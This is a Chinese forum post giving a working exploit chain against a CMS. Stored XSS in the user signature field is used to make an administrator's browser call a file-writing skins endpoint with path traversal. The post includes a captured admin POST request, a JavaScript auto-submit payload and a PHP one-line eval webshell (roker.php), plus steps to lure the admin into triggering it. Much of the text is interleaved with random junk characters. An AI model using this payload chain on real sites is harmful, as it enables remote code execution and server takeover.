|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
. `2 c" N! X2 h) p( J7 m官网已经修补了,所以重新下了源码8 P q# U6 W9 C1 T1 A
因为 后台登入 还需要认证码 所以 注入就没看了。 @8 z2 Y2 m7 W
存在 xss9 } @8 c6 j) G, o! i) d
漏洞文件 user/member/skin_edit.php
: d9 b* m0 U: w8 {* _. Z本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
/ g$ \. @. z. s( H7 A% o 9 d9 y4 ^: h2 k+ @* Q/ z
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>' R. B( ?6 Q$ n# @3 X9 d* _) N
: s1 Y3 |% v# q* ~: S5 y</textarea></td></tr>
: E0 {# Z+ J2 r( `
: e4 g0 ?& L1 E9 Z% X' N user/do.php " V }, }2 ~7 t7 V
) B) k$ g- X. N9 y% ~$ g2 }
- O9 r5 c; D3 i: [. ]% m U' d7 E3 Zif($op=='zl'){ //资料/ z y% R: u. k8 }5 L# o
. ?5 E+ O* L1 R. A" z* U
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) , L' T9 X& i u4 t; q" m& I: Z
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));8 `" R$ \0 u m( ]
) H# Q4 \# [3 }" x4 h% P
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',0 K: w# d, m5 }6 y: f% s( G. U
, L" ^& [8 b+ g8 r" ~2 [ CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
; X' E4 `8 w }( T% J where CS_Name='".$cscms_name."'";% l) X6 F; i% S0 d# ~$ Q
% h) s% ?1 S9 X' _. y
if($db->query($sql)){$ q( u) g$ n0 j7 Y) ^2 Y
* Z% [& L$ t* n$ d% G exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));: b: L+ W) U0 Y" e( U2 t
' r/ ~+ O- i# a2 ~1 {
}else{
7 H, h* p: P' T$ z
- `4 V% _' E( a+ E5 M2 N exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
$ i, v' o- k# ~; ^' {# K / H* O2 l0 t3 B8 _
}
9 F W- e; m+ T1 w' P+ g4 B/ a. f
& a; a9 [; A# b( L" Y+ X/ I: r) C* n% X) ^
没有 过滤导致xss产生。
$ r( W4 i3 v+ J$ c5 e$ |1 U' S: g7 \后台 看了下 很奇葩的是可以写任意格式文件。。$ j4 @1 I, E) `4 `1 ~/ N
抓包。。
1 A0 e$ c) A9 Q. E5 d8 I
- j+ s. O& J$ U, N5 U2 b; }
- \% g/ G! q k/ U$ F& ?本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.10 f% f0 \( q: T+ w
6 I: S. W# `3 G3 V5 r* w- O
Accept: text/html, application/xhtml+xml, */*
w8 G5 ?5 f2 S8 @
( I; g2 W9 |7 XReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
9 b3 G6 @$ E' t 5 i0 }( [- h ~+ n
Accept-Language: zh-CN3 Z7 v" q t1 P* i+ a: k
% V3 ?: ?; ?# h& rUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" |- z3 u( c3 O& s1 {. d* i
- u' c9 U2 d) v9 d1 j9 ]5 {4 m7 yContent-Type: application/x-www-form-urlencoded+ R' i9 H2 p5 F; Q( g. E- N5 q
) _4 Z k1 s7 _8 ?
Accept-Encoding: gzip, deflate
7 o F9 A5 L) _* z$ v5 h$ ^# | 3 G4 R, `' n8 z, K& k. h9 l, r
Host: 127.0.0.12 a6 [4 V' V- v+ ?
7 [+ c" {2 i4 V* o* _7 w" G, I. E# o6 q
Content-Length: 38
# h: ~! u2 X1 x5 M* P
# o/ i8 o& S7 b9 \1 U. \8 bDNT: 1$ p" r$ r: o, E8 h
. P/ |7 d9 b9 W5 N/ T" ~) GConnection: Keep-Alive& T* k. y5 l7 e! J# I) C, v
, H2 C+ G3 p9 d' R/ f2 L5 lCache-Control: no-cache
7 G% g: ]$ ~/ s% ]* z, C
& z5 Z6 a! q- k" R: h: ]Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655942 J- `! p+ `7 u O \. R5 O/ C
8 H$ l' y7 h$ Y% w4 z, T
* m: o2 K4 ^8 e0 ^8 x# q3 y% ?. s) m
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
6 H$ E3 N& T2 D O* D Z; @# J- X& ?* l. v
8 z8 K' {/ M# H0 t5 I/ A9 }
# P# E3 u8 O+ f# _于是 构造js如下。
# G, f4 g4 j5 r" ?5 Y, E, r0 z( {6 s* m! O" b+ ^2 L( O) O: X
本帖隐藏的内容<script>
9 o% Y; |: r8 }( ], Y: N" |1 PthisTHost = top.location.hostname;5 P& s8 a, }. D* c/ `+ m# e3 B6 f" W) l
/ v( @& U* I5 R% CthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";. b+ I. J5 [- |5 K2 n. K
; [" q+ j, m) r8 c* N7 ?/ ]
function PostSubmit(url, data, msg) {
: [, s7 U, D6 o: I) N4 A0 l1 J var postUrl = url;0 Y# X/ T+ Y- o2 a( S5 D. K6 x5 ^
7 g; \0 l+ I( R5 }# Z/ K2 O
var postData = data; 3 f" Q( v; {' a$ C4 {
var msgData = msg;
% K; p9 }/ j. P var ExportForm = document.createElement("FORM"); * n0 r. S$ t" V$ r. j$ V2 x
document.body.appendChild(ExportForm);
& b5 T2 G# D, u+ I* g ExportForm.method = "POST"; - N* B# F) ~ X' S6 Y4 N
var newElement = document.createElement("input"); / N- b) w" V7 k% u
newElement.setAttribute("name", "name"); . N2 e! B/ @7 o% T
newElement.setAttribute("type", "hidden");
: G4 S! o. @5 \& } var newElement2 = document.createElement("input");
0 s& p' c% B$ [5 ]0 ^ newElement2.setAttribute("name", "content"); * P6 ^! |3 O5 l6 h5 }! W
newElement2.setAttribute("type", "hidden"); & R5 W8 d' W# [5 v5 |
ExportForm.appendChild(newElement);
?0 W5 E( G# J3 b- X: v! r) ? ExportForm.appendChild(newElement2); . P v4 p" [, w9 v
newElement.value = postData;
0 C' j, Z0 {% S) H/ z8 \+ U8 T newElement2.value = msgData;
/ E3 Z; x e) H ExportForm.action = postUrl; * ?) ?9 A: [5 S: r4 q+ K
ExportForm.submit(); + F" n) e5 E% x6 [0 r" g( t6 m
};
& Y0 U( `$ D' [% _( } { & P7 x* Z/ |3 T$ b- j0 h
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
; b j; P5 |+ v" j ; h% d3 l7 f5 U& t f/ Z* E) p
</script>
( U, |0 \; a& T3 M1 \" X6 d
5 _% s9 r. g8 n* ?6 _: [$ b9 b/ q& O% Y5 E8 L
4 L! K& `0 v4 x( ?( l$ ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入1 U' S: q- Q1 r {9 x9 E* c5 I
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
1 V* |( f) r' g% j$ M5 f就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
5 ?; Z& [! z4 t2 @
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对